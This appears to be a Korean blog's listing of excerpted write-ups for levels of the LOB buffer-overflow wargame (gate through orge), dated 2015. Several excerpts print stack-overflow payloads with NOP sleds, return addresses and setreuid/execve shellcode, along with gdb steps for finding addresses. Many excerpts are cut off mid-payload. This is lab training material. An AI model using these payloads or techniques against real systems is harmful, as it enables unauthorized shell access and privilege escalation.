#lob7

• 

  LOB orge 코드를 열어보면 argv[0]=file이름이다. 그러므로 파일이름을 77byte를 맞춰주기 위해 심볼릭 링크를 걸어준다. ./까지 포함하므로 75를 한다.나머지는 동일 ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(심볼릭 링크) $(python -c 'print "\x90"*40+"AAAA"+"\x9c\xfb\xff\xbf(주소값)"') $(python -c 'print "\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\.. Wargame/CTF(Capture The Flag) 2015. 9. 15.

• 

  LOB darklf 소스를 열어보면 일단 전문제랑 비슷한데 길이를 체크한다.첫번째인자 값의 길이를 확인하여 48글자보다 크면 나와버리는 것을 확인 할수 있다. 일단 앞과 똑같이 진행하고 payload를 작성때 ./darkelf $(python -c 'print "\x90"*40+"AAAA"+"\xcc\xfb\xff\xbf"') Wargame/CTF(Capture The Flag) 2015. 9. 15.

• 

  LOB wolfman 다시 문제를 풀면 두둥 전 문제랑 똑같은 패턴이다. ./wolfman $(python -c 'print "\x90"*40+"AAAA(dummy)"+"\xec\xfb\xff\xbf"(주소값)+"\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"') Wargame/CTF(Capture The Flag) 2015. 9. 15.

• 

  LOB orc cp명령어 같은 건 무시하고 다시 접속을 하여 문제를 풀면 orc.c를 열어보면 buffer가 40이고 리턴값이 \xbf가 꼭 들어가야 한다고 나온다. gdb를 명령어를 이용하여 메인에 브레이크포인트를 걸고 r $(python -c 'print "\x90"*100을 입력하여 esp값을 바꾸었다.그후 x/100 $esp로 값을 확인하면 90909090들어가 있는 주소를 볼수 있다. payload를 작성해보면 ./orc $(python -c 'print "\x90"*40+"AAAA(dummy)"+"\xdb\xfb\xff\xbf(ret 주소값)"+"\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68.. Wargame/CTF(Capture The Flag) 2015. 9. 15.

• 

  LOB goblin 접속을 하고 (cp 같은 것은 무시하겠습니다) 소스를 확인 하면 이번에 또한 buffer가 16인것을 확인 할 수있다.먼저 vi 를 이용하여 프로그래밍 GOGO!! 위와같이 #include #include int main(int argc, char *argv[]){long shell;shell = system 주소값;나머지는 동일 하게 프로그래밍을 하고 gcc를 이용해 컴파일을 한다. 이제 system 주소값을 보기위해 gdb를 이용해 들어간후 b main명령어를 이용하여 메인에 브레이크 포인트를 건다.그후 p system이라는 명령어를 이용하여 system 주소값을 확인한다.(프로그래밍할때 입력해야함) 이제 payload를 짜보면 (python -c 'print "\x90"*20+"AAAAA(ebp+8.. Wargame/CTF(Capture The Flag) 2015. 9. 15.

• 

  LOB gremlin gate와 마찬가지로 cp명령어를 실행하여 파일을 복사한다. 그후 gremlin.c를 열어 보면 16이라는 buffer로 small buffer라는 것을 알수 있다.그후 gdb를 이용하여 보면 sub 0x10의 값을 확인해보면 16이라는 것으로 dummy 값이 없는 것을 확인 할수 있다. 16바이트를 확보하는 것으로 보이므로 main+3에 브레이크 포인트를 건다. 그리고 프로그램 실행 동시에 인자가 전달되므로 argv[2]의 위치를 알아보기위해 $(python -c 'print "\x90(buffer+sfp값)"*20+"BBBB(ret을 덮어써야할 주소 가들어갈 위치"') $(python -c 'print "A"*241"")을 넣는다 0x42424242가 ret위치로 덮어써야하므로 대충 414141414.. Wargame/CTF(Capture The Flag) 2015. 9. 14.

• 

  LOB gate LOB gate로 접속을 하면 gate와 gate로 접속가능하다. 접속후 확인 하면 파일이 3개있는 것이 확인가능 하다 먼저 cp 명령을 이용하여 gremlin의 권한이 없어 gdb 도 못하는 문제를 해결하자 !cp명령어는 파일을 복사하는 명령어이다. 파일을 복사하고 gremlin.c 를 열어보면 strcpy에서 문제가 발생하는 것을 볼수 있다.페이로드를 생각 해보면 일단 buffer 260(256+sfp)+shellcode+ret주소(buffer주소)를 넣어야한다. gdb로 확인을 해보면 strcpy다음에서 일어나니 b *main+59에 브레이크 포인트를 걸고 r $(python -c 'print "\x90"*200(임의의 값)')을 넣고 x/100x $esp 로 esp값을 확인 하면 0x9090909.. Wargame/CTF(Capture The Flag) 2015. 9. 14.